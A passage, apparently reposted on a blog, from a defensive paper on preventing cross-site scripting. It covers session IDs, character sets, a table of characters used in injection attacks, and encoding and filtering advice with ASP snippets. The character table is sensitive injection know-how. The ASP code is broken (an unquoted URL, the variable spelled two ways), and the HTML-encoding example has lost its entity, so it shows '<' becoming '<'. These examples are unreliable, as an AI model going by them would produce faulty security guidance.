For additional security, the session ID could also be made in include a hashed version (or checksum) of the client browser’s IP address.
URL Session Identifier | |
URL session identifiers are often visible as: http://trusted.org/app.jsp?session=h3uf8309ai9.830988 |
|
Advantages:
|
Disadvantages:
|
Character Sets
The success of code injection
attacks relies heavily on the use of non a-Z characters. Some small
measure of security can be gained by ensuring that an appropriate data
is filtered using an appropriate character set.
Character Sets | |
A popular character set is ISO 8859-1, which was the default in early versions of HTML and HTTP. Ensure all content pages include the following: <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> |
|
Advantages:
|
Disadvantages:
|
Dangerous Content
Certain characters are of
special significance when inserted into web pages or URL content. These
characters are based upon the HTML specifications, context and browser
interpretation. If input to the application (or web site) is not
correctly validated, the following problems may occur:
- Session information from client cookies may be set and read,
- User input could be intercepted,
- Data integrity can be compromised,
- Foreign scripting components can be executed by the client browser in the context of the trusted source.
Character | Significance |
< | The less-than character introduces a HTML tag. |
> | The greater-than character is sometimes interpreted by client browsers as the end of a HTML tag, and assumes that the author of the page omitted an opening < in error. |
“ | The double quote character is often interpreted as the end of an attribute character. |
% | The percentage character is frequently used for encoding characters, such as their Unicode representation |
& | The ampersand introduces a character entity. It is possible to combine the double quote and ampersand characters (“& “ extravalue”) to combine character entities within a HTML tag. Within a URL, the & introduces a character entity. Also, often used by UNIX based operating systems for command execution. |
' | HTML tag attribute values can be enclosed within single quotes. |
SPACE | Although most good developers prefer to quote attribute values, it is possible to omit these entirely as long as white-space characters are introduced. The SPACE character can be used as white-space. When used within URL information, the SPACE character is interpreted as the end of a URL. |
TAB | Following the same white-space principals as the SPACE character, TAB may also be used. When used within URL information, the TAB character is interpreted as the end of a URL. |
; | ! | Semicolons, Pipes and exclamation characters for additional command execution - The dash (or minus sign) can be used in database queries, and the creation of negative numbers. |
/ \ | The forward-slash and back-slash are often used for faking paths and queries. |
( ) { } [ ] | Brackets, curly brackets and square brackets are often used as script, program or regex expressions. |
* | Often used in database queries for “all” |
? $ @ : | Question mark, Dollar, At and Colon characters are often used as script or programming markers. |
Hex Version | The hex value of a character may be used, often done for non-printable characters. Such as: x00 Null bytes for truncating strings x04 EOF for faking the end of files x08 Backspace x0a New Line for extra command execution x0d New Line for extra command execution x1b Escape character for breaking out of procedures x20 Spaces for faking URLs and other names x7f Delete |
Non-ASCII | Within a URL, non-ASCII characters (characters values above 128 in the ISO8859-1 encoding) are not allowed. |
- Encode output based upon input parameters.
- Filter input parameters for special characters.
- Filter output based upon input parameters for special characters.
Depending upon the application,
and the particular phase of operation, it may be necessary to use
different techniques to handle the special characters. In most instances
input or output filtering will be sufficient. However, if particular
client data submissions are likely to contain special characters (e.g. a
complex database search query), it may be necessary to encode the
resultant data for presentation back to the client.
Encode output based upon input parameters
In this method, any
non-validated user data is always encoded to the appropriate HTML
characters as it is written back to the user. For instance the character
“<“ would be encoded as “<” and, although appearing to the
user as the less-than character, would not be interpreted by the client
application as the start of a HTML tag.
If a web page uses the UFT-7
character encoding, there are several different strings which will act
as a ‘<’ character and start an HTML tag; all of these strings start
with a ‘+’. It is also important that the use of the”%” encoding
character be carefully monitored, as it can be used to escape-encode or
Unicode special characters that will be correctly interpreted the client
web browser. There are many methods of encoding text and special
characters. A detailed analysis can be found in the earlier paper, “URL
Encoded Attacks”.
Encode output based upon input parameters |
Microsoft Active Server Pages
<% var BaseURL = http://www.mysite.com/search2.asp?searchagain=;Response.write ("<a href=\"" + BaseUrl + Server.URLEncode(Request.QueryString("SearchString")) + "\">click-me</a>"); %> <% Response.Write("Hello visitor <I>" + Server.HTMLEncode(Request.Form("UserName")) + "</I>"); %> With Microsoft’s ASP, the HTMLEncode call will automatically prevent any script in it from being executed. |
Filter input parameters for special characters.
Input filtering works by
removing some or all special characters from user supplied data as it
reaches the server-side application components. Although it is possible
to implement client-side input filtering, this should never be relied
upon as it is often a trivial exercise for an attacker to bypass it.
Even if implemented at the client-side, the server-side processes should
carry out the same input filtering processes.
The recommended method of
implementing input filtering is to only select from the set of
characters that is known to be safe rather than excluding the named
special characters. This method is referred to as Positive filtering,
and by only selecting the characters that are acceptable, it will help
to reduce the ability to exploit other yet unknown vulnerabilities.
For example, a form field that
is expecting a person's age can be limited to the set of digits 0
through 9. There is no reason for this age element to accept any letters
or other special characters.
Filter output based upon input parameters for special characters.
Output filtering functions
similarly to Input filtering, except that special characters are
filtered from the data at the server-side application before being sent
to the client web browser. This technique should be used when data is
retrieved from databases or storage formats, particularly when there is a
probability that non-filtered content could have been added by other
applications or system processes.
Special care should be taken
when using Output filtering. If the application outputs HTML content,
vigilance is required to ensure that special character filtering is
restricted to data that has been previously supplied by a user and
stored in a database. Filtering the special characters “<“ and “>“
too early in the process is likely to render the client HTML document
useless.
Original Link to Paper:
http://www.technicalinfo.net/papers/CSS.html
0 comments:
Post a Comment